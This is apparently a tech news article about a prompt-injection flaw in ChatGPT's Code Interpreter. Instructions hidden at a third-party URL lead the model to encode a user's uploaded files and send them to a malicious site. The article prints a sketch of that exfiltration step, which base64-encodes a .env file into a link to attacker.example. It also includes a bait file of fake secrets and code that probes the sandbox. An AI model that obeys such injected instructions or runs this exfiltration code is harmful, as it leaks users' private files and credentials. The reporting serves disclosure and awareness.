Windows Central
Technology
Kevin Okemwa

ChatGPT's new code interpreting tool could become a hacker's paradise. Here's how.

[Image: ChatGPT privacy settings]

What you need to know

  • ChatGPT Plus members can now access a code interpreting tool with sophisticated coding capabilities: it writes Python code by leveraging AI and runs it in a sandboxed environment.
  • A security expert has disclosed that the new feature potentially poses a significant security threat to users.
  • Because uploaded files are handled in the same sandboxed environment that runs the code, a successful attack can expose your data to hackers.
  • The technique involves tricking ChatGPT into executing instructions from a third-party URL, prompting it to encode uploaded files into a string and send that information to a malicious site.

For a while now, we've known ChatGPT can achieve incredible things and make work easier for users, from developing software in under seven minutes to solving complex math problems. While it was already possible to write code with the chatbot, OpenAI recently debuted a new Code Interpreter tool that makes the process more seamless.

According to Tom's Hardware and cybersecurity expert Johann Rehberger, the tool writes Python code by leveraging AI capabilities and even runs it in a sandboxed environment. And while that's an impressive feat, the sandboxed environment is exactly where attackers see an opening.

That's mainly because the same sandbox handles any spreadsheets you upload, for instance when you need ChatGPT to analyze data and present it as charts, ultimately leaving those files susceptible to malicious ploys by hackers.
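
For context, the kind of Python Code Interpreter typically writes for such a request looks roughly like this; the file name, column names, and the /mnt/data upload path are assumptions for illustration:

    # A rough sketch of auto-generated charting code; "sales.xlsx" and the
    # column names are assumptions for illustration.
    import pandas as pd
    import matplotlib.pyplot as plt

    # Uploaded files land in the sandbox's data directory.
    df = pd.read_excel("/mnt/data/sales.xlsx")

    # Plot revenue per month and save the chart back into the sandbox.
    df.plot(kind="bar", x="month", y="revenue", legend=False)
    plt.ylabel("Revenue")
    plt.tight_layout()
    plt.savefig("/mnt/data/revenue_chart.png")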

How do hackers leverage this vulnerability?

Per Johann Rehberger's findings and Tom's Hardware's in-depth tests and analysis, the technique involves duping the AI-powered chatbot into executing instructions from a third-party URL. The chatbot is then prompted to encode uploaded files into a string and send that information to a malicious site.
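
Hypothetically, the injected instructions might coax ChatGPT into running something like the following in its sandbox. The attacker domain and the file path are placeholders, and the data leaves the sandbox once the resulting link is emitted into the chat and followed:

    # A sketch of the exfiltration step the injected instructions aim for.
    # "attacker.example" and the file path are hypothetical placeholders.
    import base64
    from pathlib import Path
    from urllib.parse import quote

    # Encode the victim's uploaded file into a plain string.
    payload = base64.urlsafe_b64encode(Path("/mnt/data/.env").read_bytes()).decode()

    # Pack that string into a URL pointing at the attacker's site.
    exfil_url = "https://attacker.example/collect?d=" + quote(payload)
    print(exfil_url)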

This is highly concerning, even though the technique only works when particular conditions line up. For one, the target needs a ChatGPT Plus subscription, since that's what unlocks the code-interpreting tool.

RELATED: OpenAI temporarily restricts new sign-ups for its ChatGPT Plus service

While trying to replicate the technique, Tom's Hardware gauged the extent of the vulnerability by creating a fake environment variables file and then leveraging ChatGPT's capabilities to process that data and send it to an external malicious site.
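
For a sense of what such bait might look like, a fake dotenv file could contain entries like these; every key and value below is invented:

    # Fake environment variables used purely as bait; all values are invented.
    API_KEY=sk-test-FAKE-1234567890
    DB_PASSWORD=not-a-real-password
    AWS_SECRET_ACCESS_KEY=EXAMPLEKEYEXAMPLEKEY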

Uploads land in a new Linux virtual machine with a dedicated directory structure. ChatGPT doesn't expose a command line, but it responds to Linux-style commands, which lets users browse the machine's information and files, and gives hackers the same avenue to unsuspecting users' data.
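
To illustrate, even without a shell, a few lines of Python pasted into the chat will map out the machine; the /mnt/data path shown here is where Code Interpreter is generally understood to keep uploads:

    # Probing the sandbox from inside a chat session. There is no shell
    # prompt, but ChatGPT will run Python like this on request.
    import os
    import platform

    print(platform.platform())      # the underlying Linux build
    print(os.listdir("/"))          # the VM's top-level directory layout
    print(os.listdir("/mnt/data"))  # where uploaded files end up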

Is it possible to completely block hackers from leveraging AI capabilities to deploy attacks on unsuspecting users? Please share your thoughts with us in the comments. 
